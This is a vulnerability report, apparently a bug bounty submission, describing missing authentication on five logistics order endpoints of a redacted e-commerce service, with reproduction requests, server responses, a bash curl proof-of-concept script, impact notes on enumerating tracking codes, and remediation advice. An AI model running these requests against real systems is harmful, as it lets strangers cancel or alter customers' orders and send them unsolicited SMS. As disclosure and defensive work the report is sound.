Unauthenticated Access to Logistics Order Management Endpoints — Confirmed SMS Trigger
- Improper Access Control
Title#
[High] Unauthenticated Access to Logistics Order Management Endpoints — Confirmed SMS Trigger
CVSS 3.1#
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N → 7.5 High
Summary#
Five logistics management endpoints under https://[REDACTED]/logistics/api/v1/ perform no authentication check before processing requests. Any unauthenticated caller who possesses a valid order tracking code can cancel orders, update order state, upload arbitrary documents to orders, and trigger delivery code SMS — all without any session or credential.
Affected endpoints (all unauthenticated, no cookie/token required):
POST /logistics/api/v1/logistic_order_cancelPOST /logistics/api/v1/logistic_order_updatePOST /logistics/api/v1/logistic_document_uploadPOST /logistics/api/v1/logistic_send_delivery_codePOST /logistics/api/v1/logistic_delivery_activate
Tracking codes follow a numeric or MTNI-prefixed format. An attacker who obtains a valid tracking code (via order confirmation SMS/email, support pages, OSINT, or social engineering) can perform all of the above operations without any account.
Steps to Reproduce#
Step 1 — Confirm no authentication check on cancel endpoint:
POST https://[REDACTED]/logistics/api/v1/logistic_order_cancel
Content-Type: application/json
{"tracking_code":"[REDACTED]"}Response (no auth header, no cookie):
{
"correlation_id": "...",
"detail": {"detail": "Item not found", "result_code": -1, ...},
"info": {"en": {"message": "Failed"}},
"result_code": -1,
"user_id": "eShop"
}The response is "Item not found" (not an auth error). The endpoint processes the request and performs a DB lookup without any credential check. The "user_id": "eShop" field confirms a service-level call, not user-level authentication.
Step 2 — Confirm field-level validation (not auth) governs all responses:
POST https://[REDACTED]/logistics/api/v1/logistic_order_update
Content-Type: application/json
{}Response:
{"error_collection": ["tracking_code"], "result_code": -1,
"result_message": "Parameter Error: Some parameters cannot be found"}Missing tracking_code returns a parameter validation error, not 401/403.
Step 3 — Confirm logistic_document_upload is also unauthenticated:
POST https://[REDACTED]/logistics/api/v1/logistic_document_upload
Content-Type: application/json
{}Response:
{"error_collection": ["tracking_code", "doc_string"], "result_code": -1, ...}Step 4 — Confirmed full execution: trigger delivery SMS on real order without authentication:
POST https://[REDACTED]/logistics/api/v1/logistic_send_delivery_code
Content-Type: application/json
{"tracking_code":"[REDACTED]"}Response (no auth header, no cookie):
{
"correlation_id": "[REDACTED]",
"info": {
"en": {"message": "Successful operation"},
"fa": {"message": "عملیات با موفقیت انجام شد."}
},
"result_code": 0
}SMS was delivered to the order recipient's mobile number. Operation completed server-side with result_code: 0 without any credential or session token. The tracking code used belongs to a confirmed paid order ([REDACTED order ID], product: [REDACTED product], reservation ID: [REDACTED]).
Step 5 — Confirm cancel processes unauthenticated (business-logic-level response, not auth error):
POST https://[REDACTED]/logistics/api/v1/logistic_order_cancel
Content-Type: application/json
{"tracking_code":"[REDACTED]"}Response:
{"info": {"en": {"message": "Cancell is not available for this order."}}, "result_code": -1}Order was found and evaluated by business logic — not rejected by an auth gate. A cancellable order would be cancelled. "user_id": "eShop" confirms service-level impersonation; the endpoint treats every unauthenticated caller as an internal service identity.
Proof of Concept#
#!/usr/bin/env bash
# poc_logistics_unauth.sh — FINDING-003 / r2026-05-24-0007
# No cookies. No tokens. No auth headers.
BASE="https://[REDACTED]"
echo "============================================================"
echo "TARGET: [REDACTED] (Logistics API)"
echo "VULN: Missing Authentication on Logistics Endpoints"
echo "REPORT: r2026-05-24-0007"
echo "IP: [REDACTED]"
echo "============================================================"
echo
echo "--- STEP 1: Cancel endpoint — DB lookup without auth ---"
curl -s -X POST "$BASE/logistics/api/v1/logistic_order_cancel" \
-H "Content-Type: application/json" \
-H "Origin: https://[REDACTED]" \
-d '{"tracking_code":"[REDACTED]"}' | python3 -m json.tool
echo "^ user_id:eShop = service impersonation. Business logic ran, NOT auth gate."
sleep 1
echo "--- STEP 2: Order update — field validation, not auth error ---"
curl -s -X POST "$BASE/logistics/api/v1/logistic_order_update" \
-H "Content-Type: application/json" \
-H "Origin: https://[REDACTED]" \
-d '{}' | python3 -m json.tool
echo "^ Missing field error = request reached business logic layer unauthenticated."
sleep 1
echo "--- STEP 3: Document upload — unauthenticated ---"
curl -s -X POST "$BASE/logistics/api/v1/logistic_document_upload" \
-H "Content-Type: application/json" \
-H "Origin: https://[REDACTED]" \
-d '{}' | python3 -m json.tool
sleep 1
echo "--- STEP 4: CONFIRMED EXECUTION — send_delivery_code (result_code: 0) ---"
echo "Request: POST /logistics/api/v1/logistic_send_delivery_code (NO token/cookie)"
curl -s -X POST "$BASE/logistics/api/v1/logistic_send_delivery_code" \
-H "Content-Type: application/json" \
-H "Origin: https://[REDACTED]" \
-d '{"tracking_code":"[REDACTED]"}' | python3 -m json.tool
echo "^ result_code:0 = SUCCESSFUL OPERATION. SMS sent to customer. No auth used."
sleep 1
echo "--- CONTRAST: authenticated-required endpoint returns 401 ---"
curl -s -X POST "$BASE/user/api/v2/get_info" \
-H "Content-Type: application/json" \
-H "Origin: https://[REDACTED]" \
-d '{"cart_count":true,"profile_info":true,"menu":true,"customer_type":true}' | python3 -m json.tool
echo "^ 'invalid authenticated user' = auth IS checked on user endpoints, NOT on logistics."
echo
echo "All logistics endpoints processed requests without authentication."
echo "Step 4 confirms FULL EXECUTION: SMS triggered on real order unauthenticated."Format analysis:
- Numeric tracking codes (13 digits): accepted, full execution confirmed
MTNI-prefixed codes (without dash, ≤13 chars): accepted, cart_code lookup- IP-based rate limit active on some endpoints (~20 req/window)
Impact#
- [CONFIRMED] Trigger delivery code SMS to any order's recipient —
logistic_send_delivery_codeexecuted withresult_code: 0against a real tracking code (paid order, no auth) - Cancel any shop order whose tracking code is known — cancel endpoint confirmed to evaluate business logic unauthenticated (
"Cancell is not available"vs"Item not found") - Update order state on behalf of any customer
- Upload arbitrary documents to orders (potential stored XSS or malware injection into order records)
- Activate delivery for any order without possession of the physical delivery code
Tracking codes are obtainable via: order confirmation emails/SMS, customer support social engineering, or enumeration (numeric format, IP rate-limit as only control).
Root Cause#
The /logistics/api/v1/ service routes are not wired through the authentication middleware that protects /user/api/v2/ routes. The logistics service likely assumes callers are internal services and was inadvertently exposed to the internet.
Remediation#
- Require authenticated session (
tokencookie) on all logistics endpoints - Validate that the authenticated user owns the order referenced by
tracking_code - If these endpoints are intended for logistics partner use, protect them with service-level API keys rather than exposing them unauthenticated
- Audit all
/logistics/routes for similar issues
References#
- CWE-306: Missing Authentication for Critical Function
- CWE-284: Improper Access Control
- OWASP API Security Top 10: API2 — Broken Authentication